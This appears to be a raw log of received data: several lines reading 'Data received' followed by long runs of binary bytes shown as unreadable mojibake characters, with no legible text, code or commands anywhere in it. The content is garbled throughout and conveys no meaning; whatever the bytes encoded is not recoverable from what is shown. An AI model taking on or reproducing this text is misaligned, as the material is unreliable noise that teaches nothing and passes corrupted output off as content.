Data received º‹yQ:¥*L{†ä}k˜iKC{pè}5>:OâO‡%<‹Y»K$<8¢O÷aº™žãÈ°øcÇ%^ @¸ Dðü'ò“Ø¿{æ©s+oW‹Û˜‘'»¹Çg©u俐£R؉ƒTN>­»ÛcsªÒ=Üf*šÍY}§'Tâ;];Ýz03Xl¸ŒTû0"×f 9ÛjùŽF’ ¹™ˆ>ä‚ÄîÑkJüšetœ’ Å£Lwã)$±*f§D'ü:Ⱥ§¼éqò¶ï%ò†–5#³/l @8Ìîì—@sæXhN’O+/“ó†ßËÛTĦ¯Ùº’ØÁŒ5+”^º¦[KÞnZ¬Ò—“3ÿ ‡cÓì0ÕúÅB;Z¡\‰{,~bò_V#õ‡xY.†w €QÜL¿3ÛUeÓ(á.½8ÔzËè(Áp /u3&“„y&»ZUnfö9“•AÓªŸ}ê™)•Î'ÇÎ]OòßkfôôÛV&—¿ãýûp´Q[Iž n±é±y"f¬Z÷!}ÕAøån<~ûºb‹":ëü×DÒ;Ú]ãç†ì,eœsã¶6#²ååÛ¿`þíl-ç]’3cïG¤g2Y»4³'GÄ!+îu­ç?×NÂò)#­q€Õs¾Ð y:4Â(ÂY¡¢,Fì?Qªéïë»-oœP{Va(<#˜¥… OÔ2á³üš/¦ä¼,è¸<þ°å¥´$¬ Fã7k¾üP4ô+÷îðg¸ ÐOQkƒ nuΜíJ-ÇÊ%\r«Y)õåü¹Ì¨Bˆ êUÍÚ ¤| %Û<ÉT¸ú¸ˆçgLeìCt9µžWqËJÆi6/É&>3ÕÜ>ð}Ú£jZSùZØ)+Ïn0aßÏR?Ýpùök¾~óºÓíËÝ ºÕs¿ÿ˜@{ysMˆ3Ac‹ŠÏ3Ïþ˜4o ¹Ï Ì[ŽµÕJ}¨G€ë`©ÅF‹Õ¿8Y°¯d˜‰Á4h¤rjf3"ÌÔ7õJ…Î¥-ʘRñ´4AHÒg@«Ò–¢m b)íøÃÙdÖjš’/¾À‹¼0&áׯH“J@èíOsµ ¡>Z9ùåÑмqhpŠ™ü,ÞJåîòÖZÏ¿P$u¹è˾uó*‘îj;s>fÄ@þÓùßµÅHøþã¸P®"¾¿@;eÜhŒrNYkPÈVvE©°NFÛȵdz¥J‰Y1¾¹fŒûÜä‹*5ìZøɟÖk·ÝOÝY¢sÖ 9§‰Pù3-9h û©…íá9sYúâUÛm«}ïÉ"´)ÝL·óã†ÍfkJnãe¹v§QUʪŽ¸ˆ7ïœ=ìJRÊ@Æ~ÂuzP“p÷‚‚:*ÓÇø’Ìt õ¯ªà¶´_lë—|˜˜€1‚³JÆ}-¹ùG^­¶°0:««©á¿ÎfX6s2*¹4|½³ìö+ÓdڟöÞÿãó_KÐÏD×C‹Ý 鸈9ÅY–/à»ÕÏHO‡;”ÙÀãX¶ê¢ÒÔì§6ËéÓ%¯‰?WEðb¹Ïe¿œ‚¸Ú‡,Töv췂*nû¤ÄF™ hÞ'ދp|œbïj¯xÀt±ùjcI º“€šzS%G!‰ÐÃçé°ºÑåõiñnS8çðªÌ Ìd+5Èùx°fCqøñüá/ bÙ{iŒ÷6O9>×di0AÞ>9ÏI/¡UÄÌaò‡{ëŸH¦6éÙ Ž0Ù½ÁĨO2(f¨éø3 ´¹Ë'P}pË8ÄCç4u2Ç+‰jt–?Ââ•Öœ`ªŽÄáø ª†Òê衖\á
Data received !T z—qJíqȦÝ-µŒwmk|Çð6›ãv0T£=;­Ê0@|ßa›éɒ34Ÿaô^9~{µ¡¼ôÚ&tN%âfì_=cão)º³Â'¸Í¦øyc(_ §¢!cDŽÜpà´ë´È=Õ`™Šá÷u~S¦)•¼i5ÜÙ1uf;†&)^dAB3ëA¥ÔòªUÐ)Tà XÛ$2ݾ¾I˜Ýû,¤3ø‹aÓf,¿¿Ù_‚“š™¨›¤È½›T‹´¯bÏ%žÁvßú{ßÏ.ÖÇ‘ =ŽÑ& D‘M¸{s*)aªš´·? ÖYtO֕1048 Sà؄Ôgo¼¸†4ü;4!ÆöÚ­"+Í=é(c^@k# ÛM*ô·DÞn…Ôm«ìjŽ+·ZŠŸÍWß҂3ò*L¬§ˆÍ’Wó9Ÿì¹bgȀLa2‚ïXçÍYÛi–„DÈÀ8ý°­U„ú*w©æ p¨ „„úÉú~ü|ʏxÒá5¦%1/s떌ŸY†^8ç…sîþP7íŒPu­NR²w¦ËXôèäË- ¼² g½÷þÍm“J·É¬áÚ8üèI´ó<þR–@=7>~r7S‚áh¤ü’îyº˜|§¥Lùþ}«·žžê<ûì±aôT@¤âêð J6»®-œ@庻1´EÖa5° b¼0©JÞ mû)6‰ñ¢­»WQ±‹·×ž*&jÚqÙê3ÏÛy½L%ñÒócƒJ“¤ÛSp‚å«'ýCÞS/ÄÐã-ÓôÍ )û¬vŠÓâçj2"/ܨùÒÒh–y`BÅt|¡ãîîbY¼ëlA.ê×Dò®Çã–ˆE3¡Žƒ¿aÊxöeAÏË$å{v¹ì¼ö¿#ô.…+aòÈkæÝïÌE›[NKùaê®üÃl\ê0w³º4Q‘×ë7'&Ù]‚ \Ü2ÿJð‡úDQ!Ða+ÐÓ¯»À L 3Ÿ¢™ëÐ8aHdwbԐgwM,Øo>ÀâË]c 8vêQz `ü iŠÄ•¸LÄöW²-!N#ö`§°Àö‚¨*A9³¿ë´ßÕñDö^úà¿&!ïÉTa8¦ÿWã4;{LãÏû}AèiÁ³ ¹mv›à-Ê à¨çqØjóØE#îò™©£ÃÌd£²ïuÎ"· dÆ¿v;v¥Tâ¢á ‚µNƒm´3‡W¬^‡ï׃îÃ!öM€~šN 0Lñ믲Óì{ÌqTNàB}ŽÚtñýHd–£ ÿr÷˜¶Å?¢ñš—ïÚµbØ*{no kÜÞ&!\ÿEÉl~ §m.b5膏¥ìÐ6ŸÛ“ïO¼}x„‚çáGÍwꝔ(£câ2ÁÉZ×AIeÿcDƒH¢ p¬ ðŹ滈À“– P¼íU{\ÌR—³ÒÙZ»5Ê¬C5ëf«»lÃ@h-{ Ÿ8ªäAê¤uÝå÷e×ÓPx!e¹ÒYƒ~ͨäDõWê¸oÇõ hË8A|zËÙPZœëÆáìÜ£23Ë ñ¯ãE–ñrÆ –¹ä\>!ª„Ì " mᴚvÕÂ+ÀôcwÕé%‹2Z­SꈣåÊý{à¼Üç(gáDÀ7‡âf€ÙT¶šA[.<Ôì QhUc¦«<éd\GÿĽýa›òMyÅ0˜L= Æu †OÆo fúw œÙÜ#­›FÜJ:jƒ„ >´~ ’Ä»²+úcˆXû^ÈO½âˆlÛ-i@$5ØR|…U*Q@« <Zº {¦ pë
Data received Ic§³— ²BF7.ݝ‹•«‹£}œÕºð r¤<¼ï´®tHXõÓм'—reemŽz®ñ­£KÎQK}@€Æµ9HÌx»8›P …®úôv_üñ5ØІõï+9؂t`P¼ªî¢Ý}-p¤ÄÙՃ‘IÄf[§§¤7Xȼ-’ädS †Gæ±ôÉØïÒ¦š7ä«]¼àÈÁ\£à“wŸý±'9뙀G» ˆ²B¨Ó5°£moÜÈq‰õlÝ%ýa*ܪlíûWœšdT‚<AßÃ$L<è§PÐê LH3:Ü4‰‹à)æPÊÕÊ_ b×ÕñF@ø ÔÛ¬dù“}(•gdõ/™Ì³Q§ñ¦±!ìkl/´&hiÚ•Ò­¢a_J¸ÍšüººbàhâOùkÐN§m^­´Ñj_(6–@ Üìβ€;Açt13ó¨áG·‹{{ƒ¨ZŠþXéz›=ës<>tMÖõ|íýÕȸ&RB3ZØßÏôs“BŸ¹\´ê. ir“tœ4³îfSW– ¦Ì´¢Øƒð/&Ôò…w‚í¤’™:? ¼ãêTÞdÁOkÕìN-4ÜH—ÙŸ€ÿˆa½S³¡½H¿ FJQ|¡-TÅõ!ÓŠ÷l¨™zҊY>6ŠÆ‰B/ñ¦ú†UÉ\¥ÿ—Uó-Œž¿JNZ)r9ámO9¼$;TɋfãÍP§5ˆÐÜüO$ˆ× Õl~>‚é\ÄÔöÑÆ6 GaÖðâ±Ptô5ê|¹Ã…]dBy/S¯ ñèHì³%¶¢nüì:÷hã}ƒ$DûY,óÑ{¬|^Þe”¿X2*)ue.´Ëæù`š4î½F£ æ- Jµ0E !\ÂýÀá£d‡)×®x}Ùs³G6!ýþ½èͧþ„ “n´ÝOÙ¨mšºx솜„“Ôv’qÜøÑ«]Q“Tw²ßTVÑV}ï¯za¿¦”å1¶¡ê„Ö:NÈYž¾k0±iB AjO®~9?'ÁܼÐèjSBsŽµ~7„(=o¹@Lӝ;£ö‡œµ?b© Ý/*@ÀÞ3ٝTjp».csÂ{Sú Yž¡0‚{´aH3ØO'0]6rÈiÞàC—–Ù`DÌHK 1è:[NÁÓúÝçè% +àEÐy*´]û 1²$ ލJ‰ ۗԾõû¹ÏVè8•1Ùf˜›,÷è ÅÀ90©…–†±€Iê@bp\à&`²Š4_ûJhˆ\f5¢vîu~£0ŸÒ4¾|ÝÖ7è˜¤w6XƒxÓ(N~ LÛ¤^Be'O«KKCáØ«ÃÓ pK±C²°Õ{ËhAý’+ÕÑJùCÝ¢ ´¸€-6Ñá 3)a2­åÀß|¯úŽ,G;ØÈ@©X ÔýZð@84 º&k‹'@I`ˆè§S_9wÑ9¸Ö3{úH¼£¿…¾ÇÏØK“H“jœ½/J³ùþ©à®æŸ°Á’”³<‰éB5^·¾¶ä ]Æ ÂН'OÊð°SExÞ2ßGA†I8ãJÏo3Ý÷/ Ç»¹nhð<'ã >ÛX Íœ0j·”0¬ÛÄàðq ×z†EoŸÃ4IdvMpøˆ^¥Dƶ É»bm{‰:Íníw.îBô;¹Š|ô{±ˆGŽ–ÑghÝK°P.Wäôߔd Àýëö mN~Õðwì+6ÎZ—zÑ@GçÍǬ*T¢.»f«&i،,W¢ vN†«K¦•Z”©Qʼn½¼Cž’-])é`ñ?½ùdb¿ïë#‹\½.å­íÇmþ“v
Data received -¢Ä̶ýGR'FNeoH¤Á»e7·4-ÜYHö»l v×¼;ÂÄåç¿pVµ¶þÅâÁéÕ¡x<ç`?1Aær…FÓ^·Ø¸Ç*¹Í]Hq¢?Rú SoAG›mªö¼3[³Ü‡˜³ÿiqf´¼@æ¾ÜÈ@ˆ¢jÊ7%7'¿AC‘d<ÏXrˆ?’D+ ´§¢IF¯#r[ †KV“§é#@‹ni©{s- Êž™¹ÜÏÊØAºjL‚a#O52¼J—2«‘äò0ÌBJý 2@1^­*B}IGû©Nµ"%ôZZ+‚­ö%<":‹Ú“!}ŽÉ¸¥~Ì$tÈl\ˆB¬Ñ»~^Ÿ‹í.ÿ_ ÷ù(ÀŠ]ºÃí?°´]‡‡^BeŠÁ²^¯ ;ŒOŽ«$b‰¾Ù6ŒnÒ×ìyN «wlё‰?!ÕÄÊ8»f ,L}xÁðRèY¨’4 ï¶<)¥‡gØz“!Ä·¾K†þúwTºØÉâgŸÌ}3 41|³“ÉقûrçyÝÅz ,©¡i%›†üã•é²âÜvÚ½ó‘¶Ïºm´i§fF˒#»ûÇ.‘¤âUèQÆ,g†7–ðózª,j(TԈàÚpY'~^¢[Æ{X/\NS>è'”µËŠ$Y lyx£Ð]Ýp);îÙ~‹^ yÎ‚Ö î!~…]¿Zb^*À$ÓYÄ}Ä´_ë¬ÔU4*§^Oh:¦'Ã|oðñ[¥åòÜ!~tè&™ó¯/L“’Ô¡vÓûöÙëàÊïâD%ÛçzTWã.™OÕÝFô‘P)`4ZÙì<(®5Žën&•Øþ©HénÃêڔzÃàhÙ]´E½ÞñŸ½S¦üóà™($'”ZO¦¥¢Q UCºÕøûÞÀ˽((‰Ø2ÍT„®G›ÐqgA?å¢æl4Lëb¼doÓúÏ~v­…à@,ȗ8„B„“'0 Òñµ±ä»zoTfZà¸Ø?Åâ /_mEM”ó»ì_ÖÞÆ5“ŒàY^"µ·>¡6H ÚVAû¤¬o’åÈO+¾äø‹ÍÐÀB*¶$uÚpY!ȅi"íŒw蹆)ãƒ2§Ù?ñ…Å¡b7àU/h#"¾øuзêÏ +-Y%ÖNP?BvK>n]gÀGj¥ ·ÚR¨Xž„i­¬Š(#š4}¯]!!hÞÑ4ì ‰ÐU›g‘A²­ûYF=SÙ®²µ%º…鲂°“ySá…jEAøc»Qffu<Ž€ïU¡äÿû†¨W­!™Jl9Qþ9ܐ΅f|ìµ;\D™Ž‘žûä{¢T³¬¶&'Ù ´Ä1ä ùæl–Íïãq¹Ë£o|YÔðž- ¨w=ïÆ+Þ©#;þH³÷z±¤T›Œ˜.~jC©™ïÄÍIUOpÿñ‹º“écõ–˜PÍPíؾ´5hÿT.ˆiÄqÿºLC 0’™÷:O‚˜Íì&Ú±±/rfHÞDŒæ Ñ­¢2uŽ†ÎÎBêníC$0yª±›Ð¼d7sÿ\M÷úFûê}ñRzßWÃ,ôÕõ˜ws‘‰,ÓD 8‹Í'PaUÌjTœè¸ÔP•yìÛf1³—îöŸœSÍæF‡,&’¤xŒñ¿0Ñ õàÉuG™{îsæœ`ÎGtöÌJÚب|Òó~ópfO¢6§fHYy5D‚¼ý8.'‡¤p±dû¨„ÉdÀMB¶(õþB¦ý{\Ÿæ!A+·+Ó²Œnóx]XÓÚÖ.a@Äå;ËéTøôí—0E8éÛ8-ºBêÖ¥¬d¯QErQ1 沦AÙ×ö
Data received p
Data received nóÑãƒ(º?Ñ8p÷64¯H2ê6Ÿ²vÏ/lÂ~0 ´‹Ãu(èpÛäÚº4\+ˆÞ¼¢%‡¦äG™@IíS½Êðý¿^æeXlàìº+WSÊ©óWÓ¡Cd;ÅÒ0¾s…¹þ“œ§uƒywn½
Data received @9µ/ßå«ØËxNà¡GúÙý kìۜ䠜Ï[¶oÄC¿Î•"1‹«RD y/Füˆ¬‡i ­dŒˆ;Õm\µá€û¾‹áÌC>ìU–aD¿(&¿˜Íd]jöSŸí„€Ÿ^#‰™GIo¹ìG¸«Š:yÎë:ÎÚ¦óâøĪ=¨Çiú»¢Ùå†/Ôqw¦w(ºžûÉ2ó’N­Ãº­‚Þf`µîɹ$ôØþsR`õdù§ïªü´‰È¡=ö}V0¢gÑȼÅLʟåu°hÊ;© /½é~¾’ÝoÛ6Áð§ÖŽ~p&(-Y⫋Ám}¯ ëN¯‹¯tÍåD[ܽ|;³ö¡< :Sòo˜JXsjŽ¦¤@ýˆ›ÞîmL‚YûK$%V`rÆÄy€eŸèv;wÝÉì&2¨j×e—7âÛª<‰w)rRxwP(ÑÀöšÌ‹ ¤ÙÓ$¹Ú†¤ïYX{îòo»Õú^ëm,¿€\u÷LQ’ÙÉuFƒ°}ÓxÊúšÇÈ¿ À”á“ȹԷJ{7eþýmòÅ c«¸5<^Š©°ãÓîÌ«K´.þ±Š³Â÷ù|ÛWQ-DEÿU`Âo¸52Mj˜Ëú“݂>ÏôÈÿ„â»vWâ i„‘ÏVnÑJtd¹©™d•a1Å3J¼„¡+ Þôоsˆš®kpïÊÊ=ŽIô N†‡è|+†n<êCE䑬Eãt#WŽd»6—UÌpü¾‰Ö󊽾~kîá–'í؅Ñaaùê! )7sñà}-3µÇÁ(â0ÃFØÓo¢#ŠuÒ ~‰b`w¡÷@•ÿÇÓÈuʪI\ț‚ZŠç±]VqÚö5õ}¢Þž”rÝjú"«áÆ_ë¤N0ßó=àŽiXê¨V(oCvY̕Z¡ØTÙO” <bË6~¯½Ÿ÷ٗ@]‹ð¨0xôlƒ£Ìzllp²± 'e8K^©ØVQ Mj›.6‘ñÄ¡!jÑmÎd¼GÕÁ ÁvÍ ñ Œv·jÉ”ø…DÐ ídŽ‹H‘&&ÚÕÛ՝ª .c$tüSŠê®§å¡L¨väg]Vâ§&Ê¡–À´oß Á8~¹ <š#¥‰¤Z}t¨ÿ|é²ËŠØ†‚LS¦µ ýÁ DfUg¿…¸ _•Á² eašüŠš|û¡›Ç^QïË9¢jè)<H_eÔ9ÖÇxz,SÁ´F…Àøbx9≛šñ¹Ôû«ÐíÇhO×Ud1v7#x£Ã-URKº8—”†š¯9XuwlÂà›šñ…MÚ?=mØ” ¿ N]Xä؄JÞ’'‡§E²Và+cŸ¡-m=‰Ø?ÈFcs¸”3éøNB´‡IÐxNu À¸åc¸SF~Æmƒ»ô2…2[¶Š½Ä:–öùk+d¶tTndz›M*«» ÆÏ£Gc>AÞg°€0qø焲¾u&ûmš¶p`÷ªŸW6!Œ–4Ÿ•xÚÖän°g îÓÛ¡¤i=p¡9sX{$ñXûÍZdÓÈFbÃÆ’¬4¸nŒ žßX±…ÇæÝä)Ï†* Nïb»œ¼v‹ëê<#{¤ãY K7í͝<Å‹'Fêè±ùŸˆ#zÚ8Á„˜…wän&üt¼ó_óð{ѓˆ)’Œ“§Y/ÅɊÉG’Z¼™cÄanÖ²|Æ51Í.Î[ˆàdq xn¦Ë áítù3Í^6h@Ãì#`¸Â¬ »¥¤ŒCÇ$gž*zukö©íªçrâsò~äzVMZ˜¦{Òctv¸D-š EÊ•ywf¿b
Data received a¬j£Ã÷üf„…í9¼Ø€†úEýbÿb†€Ï#ÕþýÏT¼¶ù2´–Nˆ>$ðhKüDmM±`Ó¢)p ­¡ªˆóœ ÷õrìRqÅLìǘCWJ‚OO@B³òlm²ãÃ¥scŠ)¬`S‘Y¸çП/ÝåOy‹çªñ?«0ö¿f&˜ ;ÈÃþj‘¹¤Ó åyþªÁö¯—«Z–O¬òƒO†-î²}š‘~9ò¼Ÿn’®¿††7Á•“QNúã˜2„„ò9Oîàf1öÇ-è̚CeZ¯¢ì?ø—. ŒxK»®Š‡x¿I3÷+Ïì“Ên â*ì¼æyF`{\±IsHäÿ{ŸuS­Àfìa9 Wù„ÚbçB‰•ùkª(¨qô†äçŸGÙ­ëþ9çì¬Ôb,ïÏÜT-XG}²ñöÔtáH¢»ŸÆe®f°ú6.ír'ҝ„ÝÇì?‹zAê™'äò¹¥I%MF낏}gRÚ¯$Tà‘ŒòHÆßr 5nš$Àg•ªð£­ÅlŽMõX]üSk[½Ñ¿¦(Úne4–82Ðΰ¢Tè½àlÆ/ör/¯¥WNƒê1JUh‘QÆ)«s‚þ À]œÂ}x™ dÐs°‹‰·å™Q;/»B„¿~¶ýÇ=ÿ! iÃ8ßg7­ÎX¦!}¥ê6·Æ³Î¼A‘C֚Ø7óê¡åQ.Kø‚7™®Ì½=µ»[a+“¨—Û ȕl~Këá”ý= <V%¯È›† Iðf-,"ƒÔKõ`(0<aIñ¼(/)ÜtïòêI«‚l4Ëæê+>7åØJ4ö¤Œ]·/À¥ÐeÅd՗›Pm©nc‘p‹† [èTóÚö((¸¼ÅaÐá{¡ñ|ɀBYÛmϲŠH!Š&5³ËЌI8¸×éEãHUw!³ ÜLŒùD­þPu|IMÅÈƔ[OÔÖõ´qϹßË2ùXª¾uW ‚A°Àç¼|Øzö%W/ŸÎl¯ j·®õkÜ(^fìü”Ì¢»h੃½ ùK~ëó2X¬¨8vÓmÓ%)¯¬Ê…å&˜È3'úl< ‚{ˆßÝ9-À\â–VeôìÌW/5Í÷"‚sácK±‘ ǐæŸêyn=#|ÅW_7öðÂ¥ Âóê¦c=õ@ BñôSZº±íá) Îà–)Bɤƒ7÷¿—É•£ þ0$_}_ÏãÂíяùž‚1Z׍w’<8æ7~¾à´ÔbÀf&oÞïók_×z ’Aý—-Ẻ-¤Î&0¾N]XÅBiß9¢d+ªÒÉ^¸Ñö:a€¾„ígDsŠªn·./0{ÿÜlÌö÷ÉÓx’lÍ€¯3xˆ&+™ : ú r u¼T#ùeî>Äv›ù À¯P8;±S~ÏîGkEn· X[ª] uR›]¶ž· ó ªá9ó·šØ_ÝT󹓋¼–rå¿·µ¢«ûï·aÚ fj3¢òW(ø;Víóõ!~³yQR¦g‚ø0ÖÊ¥ÆG•u¦v’Y2Ë ¸îžs—@°/Ã~Ñp‘/p Þô^7Þ±”Ó,,¹Tƒtx4òx+”w<sc(tãû [a L©cr-²ÂyYH£ýïi[k²F~Å£¾Ïòî#à:ø’¿gç¤'K¼+þ}H³òO "02åÒ!oò]#Ìì4º‡³S"»GýA™4>H€¦Ø΂Œ¨Žƒ´¤k²öN(寎SiÇ8ÔÝû‹„ÇÜ(Ì?7C±!årÁk]̔µ&;sTY¬
Data received U̖ LIÇÒ|tÖ+vº‘K¡¥…ÎŽ\sI˜£¥ȹQëŒ{9ETìÓôõ˪5UcTx ÃÁù½6½uÚ.åh{–Pæ«z£aw'Ö®S¤Î[6ÔÊ,½°Ö#X3,ÛùOnk‚çìÊ- ƒrë1†©£vyLJ0-BKö:mô¶èrTÓÜñ •ÖB´‰¿p8zÚ(c¡XgÞÈb®ž3›%Ƹ„9†×¼’õ þt¥þ⠛¼ìª#WŽ(ª–/âÀO°ªÿrùe3‡ÚÚÚij&¹¾+yіþN“otäH~ßMìtÀ;ÑG™o.ÊßcýÝ£½ì´:ôÚ£hê”Sàÿô^)ºÞ [[¿´‡ä¢jÙé¥ãJívë8K…¹).ˆjÅ,÷áÖˆ²{ð2Xœæ1kæb°®"o„Ý@­™F­Xԕ¶àÑÁ+A⸃ª|ŸYGϟ’Ucí¯TûI†‰Ù¿Å›&ß«H¢ã;nʍ‹1øï]¶fþ‚*æ;mTlßß à5ϯ2¨}d™E3 £.‚z°#Ú@{€Ö®õ!Î÷\ƙ&þ‡%ôæ‹Ê"Ւ—"¡ü"cÓ‰!õÿa@+uþ ¼²—mu3àk¥þW[o°Âp$æëÇ:7PÙò^hì/åUQ[ 悆;N~˜0¾1GYÌê¿ÑŽ†ÌøÍo°V¥]ï€koɇ­ <'XU:_QkŸ‘°¸†òHŸ|òdö;qNúw·‰Ý ýÆÅ@³LZÞ¸¦õˆE6YƒþÆ ‡!žÕL³Ùý‡ò]wH’üEêëAii@Å® ‚aÌkëі3EiŒô÷Êx“Ö/]žr)„–÷6¶ù°W÷!‘wóäó%>Ïu£C=ùj+%·¢ N@2•€+mô>v‡>“}‡!µ&\ÞrtˆßLY¼-–žH1§´¡äB¬2û¢ëq²/#S•g6…«”£ÀWäT!óÆI³#Dã5)f7J\ãÉð‡2¡¬çxæ}‡¯Ç¥éNƖCŒÝ—s~ôen½„â•kmTºVêçééæ™Ñ{MßÂk:bËÅXÖþúù/§üg3-æ¦hà ¨ëã$AI•E8©zô›$绲™PÒÒkÞ%bcûüuü¤ssòÜ|+åMG…D¦ åÃPP¯4M0LAÚ.Ÿ£lúˆ©JՂjPi¸!3Zk¿ÔЙÏýÝX¡ülæs8ïmb}Ù%/[Õß> Évu0¢²Zø^2%0J~{W±…´?Øy÷6¸xP⢭zõ^TÀ%Ž-÷ ÍÒ)J(Í&!èÿˆ Qw_æ'" îz̄Œù¬~Ú';"´ø' !E:âÍíö<UøkGj®@ªê.ÆŽ™ÝÞÙ EǶ³0èg†îGFý`|ӕ³CÃÜÌó̾rÀN'o´ªþxžù§R½¼”tÊfoÿ¬|ѐ×àôIÏNà'F/ˆ@b¡ýɆaœ½{9üfúëžxf'Çæ‡TÁ©<m‰pƒµ‡Í°ïØÁ+ÿÐsØØk|-If#˜¯aaó¹¨ñÔÐè «téÐ~bê¶7 ú¶Ñ±T\¸:ú°çb]0ÍêÃwÐْãàm¹"Ÿ0Ù 1gÙ:ώ YY†éÆáéŽZ‰i§W%¯|âÏ·ÝO–¬c}ô’[ôõE¢í)Ðøü-^㲒g/£0Æ÷&î^o6V‚Ê3ú¾Žc{\ÄGƒF1´8ÚfñýI2dឥX@uŸoг~s¸žÆÜLiáCMTã·M% öÁm5µ©àª
Data received ksÂÙ¼7ÞÎ ÁAR=÷Þ@ L“ýMW°¾jL8vm~.øs>@|Œ†Œ0ÔOǸ.AâÜ»™Ò¿IXÃËðâ ”xvƒ+ˆëv?çV©&NgH×+­Ò¢«nBÅ?m¦iEü_ƒ3^¡E…xÉ8¤¿–¥?hÅC¿´$ è֋UéÀh[¿îu³5ÿÄÁMë“H_Pþ(³@nÝ ïvbÇÐYu®¾L-öÖNŽÑJvpñ¯)}¥ßËó{Ï©´|›ÖÀ©_×'ZOȍÏ'¥¯£"*ôªE Aúö!kS%êM9À§ßX}r±ªGm¢¥WšnÙÃð9as~̬vYäÛR÷#ØøººL-sÀJ°—s üÏüÎñª—SSÊÜ<âþR¡ K¬ÿ„—:Ÿ>W5"Ý\â×æS¨dÊƤL†PvP¶…iÁî戂ëp›ڝ»¨ÖãÒ2öœ#ã_ûf 1`ø“ñÉGÙ$T«~‰FŒÔ"™¦Ìb~Yï †²t%UŽ^U/äv˜e ý® ƒ$Æ͌]ˆµØ½Õw=[;O1Ú ì ÂuÖ!ÿ¬~`aÅÍ{N<9?sîV?k³‚[na/  gž¨ ÎëŽ%jEýû(°Ñýü|kbqüÕ7ßî© Àï«ýixàP ô¼…4a»Ã¨N"¼ó¸@’l…Ðoè_è)lU cy¬Ëƒ®¸úËlÐs˜ÐdK¸'[aYA‡ôY–äaÁ€cz¬`h\‘±Û‹Š_í˜l­yÃhÓüùÕïÃÔÿ®Ø|Z¬õÄ·TmùÈä”y٘c†èÖRÛx¿=Z,©½Ê`<«½Åë0>j ø#3Ïpd­ü:Mq‘ÂÁ-ð=Q –Õ"Ûp°2;(!X¥æ7ö/Äj1UÒ½Û~Ð2`¿Ø¥PÊ×]9X×B¤é`k±Å>Õ e®Ž Пæ^×$œ-F·™¨þÖý™uK„âM™ eÎVsqÑ¿~zˆì^p|ÏÜí+âlHxFNQ:µdgi·©–6©ÔȻŠ’|ú#Ú9,„õ“ºtȜC&™µ¶ˆ1ÊÊl.ò-ÑÝiáÛƊ÷"äöÕÀª Õ¬¡¥'ÉUŸ›Ì€ î©wU5–ƒGYYÖ¢»ù!‡®ªÈÞ$ˆ=µ *ƅ^ÆO²±=?‚¯]eŸD¼]Ó¦æS«Ë"\¯ôÈb Ïv{‰…¿8Àˆà¸ùh–“|Ô`ðøž­Îg·3ÔÁŒÕ ñhóÅÜ÷V[Ro¹/_±Ø‚`‚ØÑ=ÍØÔ´q=1 $6Ú nQ핟n㺤`»«4ã÷cî†ZȳS3›Âxg9¼Â :xlsE X’Ù'ã_—¿$œ«R±Ñb§†d–ÆÝ]Ô^À û²`k¥ëz}ÆÐæŽ> áè¡ú¯ÝÜɟh‡†kÝþV¥þ&o´áûÿú Ø{ý,ËuQuð}»òÓËÁйa“ÿÛþ¼ÄoÙÍUß5ÊË¢Ãs°iU‡>û‚ŸÂ3Kdk& d¾d ÚiˆÂ5lAOz'!·™kã=yWî*ãÊ}8¯Jwà-Ó” €øzùѝ–£Ìk©hðj3ßaM'Gøv$Ž“Üß)õf Ú5RB1´ñLí Ãz°¸=ÇAÅ>¿Ù‰Ú±r4öïÙýԛ¢µÃ*<Ñ·‰í©ˆ½8sN¹Æ| DµÛ–ìÇmÞí«ã»wô*ŽÑÀ¤àOüfaå)ÏjÁ]± Óí°O/
Data received [ qD =K7dó @t``©Œß=ž+<ҥ̰}ý.£®±s*z‘0'WÚ䵉>°à£ÁD…£|ˆIbU5 ðüjLÁÓ«µ£oŠ¼Ìdœ5G¾ååcŸÐë¹!ïp%"Ø'³Âþl©¨1žM¯¸.%ñ4͇2ma¨´‚wãIÅÝÂzj†’opAsÛÔ¨'÷¦Í0Cý£MøŸîíÃ-Õ#Å.äkËÄcòvÉ䑮ÛñÑÝÕáΘµä0.1Oûï¶Ý–ÂKGá:¹ÏÕhéao`qb¬Jm4ږWc—΢Õ3ãLöÍw¨Mù†„M,K¾›LiâÀoæÎ[/F¸\-bq½ÈªY¦{"ôQ8¢;i£»8 °ÿÒ¹¦ÞÄh<ˆÕÕŽ®[6¨éBID¶×N ðM%¾guê{)C¼’myhÿ óØ8¨Ÿò¸ èÆoÅÏ䥀ÓËIšèé9å=:ĖÄ#Efßâôè4»îfu51;rÐh„Dh¤#…ôøÝB®=T~ªêàI¨ë(À*éx0ì{²2Sé'`3RêşVËÜ?+³øA–Œht{h®n …j]ÏþM°øeal¯íñ„>ëv(¦?M]ã&I'¦RðNÚLær9Ô~­øhm¯G×ރŸE1è*ãj6Þ:AidÀN)4Â1ÞªKòÆQ¼DA^'` ÜµðY„Æ­ÈòN®U –i‰J…¡–âÉþxñV뛘"ñLuºõt²PÜ TÆ\©eëG/¿F 4¹…OÍ·˜ú{¢;›±s_–XTªÑwQÕÍ6£Ð|"2(¯<øL½ßIÀø!¿j„Á2#vñ\9IçOLðl¿wYÙ¨x´…)G†Ô$¯Ýwe«ÂÜkô„áÃOØZ0SªŽ/©t$ÁÞ¡á1‹mm»å÷cá—î÷ÅA 3Úõö¢Ïü¼^#—DòQ§»˜&m9{*T ÚàeMà¤ÄÍ*ô“”“LâÓt¶=¾q’;V»Š’a/Ceff¹C¦¹Éý¼Íêç»b(̬ Øʤ*¤$íÃ9ÒзÚvÑMq8S ÀsÖ6+ÊãË}P4#å*w¡^õöܯy=?4‰Ðç+ÀDj„ʺåÆlԈøZ¨q­l‡íPÕ7ç\'fôHƟÕ@ Vê×ʲ­oeog…VÃÚÚÅÇ2z»ÒáߕÐ.Hš®(‰"ԕQS+8u\—¡Ï™¤Ð]ÞëŠh† d¸ãù ζX!‰<c\¦P%iHÿ"q¿Û•°!¢Àw&@ÈPYU&*’aUˆ_áðtëìÀw¦ò„tð™`â¤þ¹ôŒëuõP^,¶‡ T:3ÂJƒ±DõbçRû’•¬b êšMdø FÞó€Ûâµs»ç‡W}Éùהc%°½î:M`[>ýr.PÌWfe˜u6oaÍ.åöBõúB¼R&— ‚+VhM“ÖQæ8PyZ‘܅l÷æ]V5FOΩQŸºKŽ€‰ûÖ±PöDnBNîv}µ/ ±Ï $›~Þ^@äû_/£N@S">Q¼‹£±y.a—Ê6~¾*h•¾åCÔp…îÏ('øc~wßSýëJyD(…]×< á`«êDÉlIS6ÝႫy¡ŽSI½6ÀgÜÈ׎…䈹üìÁ¬{'“Iš-›ÝªTρ²¿‡Ú¯ âoNåiÐj L9F‹vɃOȌ~o④bîhÌH¼Ù1ÔpÆö 